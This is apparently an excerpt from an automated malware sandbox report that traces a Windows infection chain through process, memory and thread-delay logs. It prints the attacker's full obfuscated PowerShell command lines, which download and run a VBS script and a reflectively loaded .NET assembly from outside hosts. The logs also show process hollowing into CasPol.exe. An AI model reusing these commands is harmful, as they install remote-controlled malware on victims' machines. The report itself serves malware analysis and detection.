          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep count: 1612 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616Thread sleep count: 8157 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224Thread sleep time: -19369081277395017s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224Thread sleep time: -4200000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900Thread sleep count: 272 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900Thread sleep time: -816000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2960Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900Thread sleep count: 9700 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900Thread sleep time: -29100000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1080Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3528Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040AE51 FindFirstFileW,FindNextFileW,31_2_0040AE51
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,41_2_00407EF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,42_2_00407898
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00418981 memset,GetSystemInfo,31_2_00418981
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_41-34271
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,31_2_0040DD85
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,31_2_004044A4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2140, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3972, type: MEMORYSTR
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: unknown protection: execute and read and write
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 459000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 471000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 477000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 478000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 479000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47E000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXEJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7A10.tmp" "c:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC85F.tmp" "c:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP"
